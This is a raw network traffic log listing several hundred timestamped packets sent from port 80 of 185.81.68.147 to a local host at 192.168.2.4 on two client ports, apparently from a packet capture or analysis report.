Dec 13, 2024 07:47:46.034540892 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034655094 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034668922 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034678936 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.034998894 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035018921 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035028934 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035037994 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035047054 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035056114 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035063982 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035068035 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035077095 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035085917 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035094976 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035346031 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035489082 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035499096 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035506964 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035516024 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035607100 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035629034 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035639048 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035649061 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035657883 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035667896 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035676956 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035742998 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035752058 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035759926 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035768032 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035890102 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035898924 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.035902023 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036058903 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036535025 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036556005 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036565065 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036573887 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036624908 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036634922 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036642075 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036652088 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036664009 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036674023 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036683083 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036690950 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036751032 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036760092 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036767960 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036777020 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036784887 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036797047 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036804914 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.036912918 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037077904 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037087917 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037216902 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037233114 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037240982 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037250042 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037358999 CET	80	49775	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037383080 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037393093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037482977 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037492037 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037498951 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037508011 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037517071 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037525892 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037550926 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037559986 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037646055 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037653923 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037952900 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037961960 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037969112 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037978888 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.037990093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038125038 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038135052 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038256884 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038265944 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038273096 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038281918 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038419008 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038428068 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038435936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038444042 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038453102 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038463116 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038471937 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038480997 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038543940 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038553953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038561106 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038568974 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038852930 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038861990 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038868904 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038877964 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038887978 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038980961 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038990021 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.038996935 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039024115 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039032936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039122105 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039130926 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039139032 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039148092 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039444923 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039453983 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039474010 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039483070 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039491892 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039606094 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039618015 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039628983 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039774895 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039783001 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039791107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039799929 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039809942 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039833069 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039844036 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039850950 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039859056 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039866924 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039876938 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.039885998 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040103912 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040112019 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040127993 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040137053 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040146112 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040154934 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040163994 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040174007 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040182114 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040190935 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040199995 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040209055 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040218115 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040226936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040235043 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040244102 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040266037 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040273905 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040282965 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040292978 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040301085 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040436029 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040611982 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040621042 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040627956 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040637016 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040647030 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040668011 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040676117 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040679932 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040688992 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040697098 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040705919 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040709972 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040713072 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040716887 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040719986 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040729046 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040781975 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040791988 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040798903 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040807962 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040911913 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040920019 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040927887 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040935993 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.040946007 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041049004 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041057110 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041064978 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041073084 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041209936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041218042 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041225910 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041353941 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041363001 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041524887 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041532993 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041541100 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041549921 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041671038 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041683912 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041692972 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041702032 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041711092 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041776896 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041795969 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041804075 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041812897 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041824102 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041835070 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041847944 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041924000 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041933060 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041946888 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041965961 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041975021 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041981936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.041990995 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042071104 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042340040 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042349100 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042356968 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042366028 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042375088 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042386055 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042393923 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042402983 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042419910 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042428970 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042437077 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042445898 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042454958 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042548895 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042557955 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042565107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042731047 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.042740107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043023109 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043031931 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043040037 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043042898 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043052912 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043070078 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043077946 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043112040 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043138981 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043148041 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043155909 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043164968 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043173075 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043183088 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043262959 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043271065 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043277979 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043287039 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043294907 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043411016 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043420076 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043427944 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043565989 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043575048 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043730974 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043739080 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043746948 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043792009 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043801069 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043808937 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043823004 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043834925 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043843985 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043853045 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043862104 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043870926 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043879986 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043934107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043941975 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043950081 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043958902 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043970108 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.043977976 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044274092 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044404984 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044414997 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044425011 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044434071 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044445038 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044506073 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044514894 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044522047 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044531107 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044539928 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044550896 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044560909 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044651031 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044660091 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044667959 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044820070 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044961929 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044971943 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044980049 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.044989109 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045084953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045094013 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045101881 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045114994 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045129061 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045139074 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045562029 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045571089 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045680046 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045689106 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045696974 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045706987 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045717001 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045840025 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045849085 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045856953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045871973 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045881033 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045890093 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045898914 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045908928 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.045917034 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046003103 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046013117 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046020985 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046030998 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046309948 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046319962 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046328068 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046335936 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046349049 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046360970 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046370983 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046408892 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046417952 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046426058 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046444893 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046453953 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046477079 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046485901 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046555996 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046565056 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046571970 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046581984 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046715021 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046722889 CET	80	49776	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:46.046860933 CET	80	49776	185.81.68.147	192.168.2.4
